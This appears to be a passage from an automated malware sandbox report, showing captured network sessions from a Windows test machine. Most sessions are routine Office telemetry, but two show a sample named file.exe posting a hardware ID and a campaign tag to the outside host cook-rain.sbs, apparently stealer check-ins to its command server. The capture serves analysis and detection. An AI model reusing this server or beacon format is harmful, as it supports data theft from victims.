                                                                                                                                                                              2024-11-21 07:30:17 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                              2024-11-21 07:30:17 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                              Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.649713188.114.96.34433180C:\Users\user\Desktop\file.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:16 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=VJWPPG0NIKAEOZ8
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 12847
                                                                                                                                                                              Host: cook-rain.sbs
                                                                                                                                                                              2024-11-21 07:30:16 UTC12847OUTData Raw: 2d 2d 56 4a 57 50 50 47 30 4e 49 4b 41 45 4f 5a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 33 37 32 30 44 35 36 34 45 34 46 30 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 56 4a 57 50 50 47 30 4e 49 4b 41 45 4f 5a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 4a 57 50 50 47 30 4e 49 4b 41 45 4f 5a 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                              Data Ascii: --VJWPPG0NIKAEOZ8Content-Disposition: form-data; name="hwid"493720D564E4F0CB63CFCF7E6C45F838--VJWPPG0NIKAEOZ8Content-Disposition: form-data; name="pid"2--VJWPPG0NIKAEOZ8Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                              2024-11-21 07:30:17 UTC988INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:17 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=flj1vvgvsbh4rll4nobtnomi78; expires=Mon, 17-Mar-2025 01:16:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TtjMy%2FOOHC7t%2BvSqZ8l0aQV%2FNSc19C1HlwB1WQR2itnN1XpfEro8gGNhDCf%2BwOP3hD5qeYjXSfOaDnN7Fj%2BhbosBN0RRrP8Bwhhqt6VgmQ2ipQTFDz9UVTcIlQ11INFQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8e5ef9357a99c409-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2320&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2829&recv_bytes=13781&delivery_rate=1250535&cwnd=167&unsent_bytes=0&cid=8a40c1020a4b6318&ts=928&x=0"
                                                                                                                                                                              2024-11-21 07:30:17 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                              Data Ascii: eok 8.46.123.75
                                                                                                                                                                              2024-11-21 07:30:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.649719188.114.96.34433180C:\Users\user\Desktop\file.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:18 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=3F3EEK47QWKUX0TK
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 15099
                                                                                                                                                                              Host: cook-rain.sbs
                                                                                                                                                                              2024-11-21 07:30:18 UTC15099OUTData Raw: 2d 2d 33 46 33 45 45 4b 34 37 51 57 4b 55 58 30 54 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 33 37 32 30 44 35 36 34 45 34 46 30 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 33 46 33 45 45 4b 34 37 51 57 4b 55 58 30 54 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 46 33 45 45 4b 34 37 51 57 4b 55 58 30 54 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                                              Data Ascii: --3F3EEK47QWKUX0TKContent-Disposition: form-data; name="hwid"493720D564E4F0CB63CFCF7E6C45F838--3F3EEK47QWKUX0TKContent-Disposition: form-data; name="pid"2--3F3EEK47QWKUX0TKContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                                              2024-11-21 07:30:19 UTC978INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:19 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=f6o8a9oh7o0tu9ae3m3ru70d8l; expires=Mon, 17-Mar-2025 01:16:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OMIt7ymXgAenc3WFSzgfZH43dpseaADRXXCMtMp7nKTKsTA77Ad36bkJZvQatMwExTDv7rOokhQoANQUj2v5A67rC5cNSmY9metQ4vP2OkQkeOvEV1LZ8M08ctAeLUpn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8e5ef943ece87cf6-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1783&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2829&recv_bytes=16034&delivery_rate=1582655&cwnd=200&unsent_bytes=0&cid=27ee095b466a8616&ts=991&x=0"
                                                                                                                                                                              2024-11-21 07:30:19 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                              Data Ascii: eok 8.46.123.75
                                                                                                                                                                              2024-11-21 07:30:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              6192.168.2.64971813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:18 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:19 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:19 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 2160
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                              ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                              x-ms-request-id: 7268c357-001e-0066-5863-3b561e000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073019Z-178bfbc474bgvl54hC1NYCsfuw0000000140000000008dm9
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:19 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              7192.168.2.64971613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:18 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:19 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:19 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 2980
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                              x-ms-request-id: 1aa7a34d-201e-0096-3676-3bace6000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073019Z-178bfbc474bnwsh4hC1NYC2ubs000000015000000000de8z
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:19 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              8192.168.2.64971413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:18 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:19 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 3788
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                              ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                              x-ms-request-id: d37f37b1-d01e-002b-586c-3b25fb000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073019Z-1777c6cb754j47wfhC1TEB5wrw00000006qg000000001pum
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:19 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              9192.168.2.64971713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:18 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:19 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 408
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                              ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                              x-ms-request-id: 704d106f-e01e-0052-6c06-3bd9df000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073019Z-r1d97b99577n4dznhC1TEBc1qw0000000a60000000000pas
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:19 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              10192.168.2.64971513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:19 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:19 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 450
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                              ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                              x-ms-request-id: 05856cf7-f01e-0020-4060-3b956b000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073019Z-178bfbc474bp8mkvhC1NYCzqnn000000011g000000003asc
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:19 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              11192.168.2.64972040.113.110.67443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:19 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 64 69 7a 32 34 33 5a 6d 2f 30 47 6d 38 4d 36 74 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 31 61 37 65 36 62 39 66 33 33 62 31 32 32 37 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: diz243Zm/0Gm8M6t.1Context: d1a7e6b9f33b1227
                                                                                                                                                                              2024-11-21 07:30:19 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
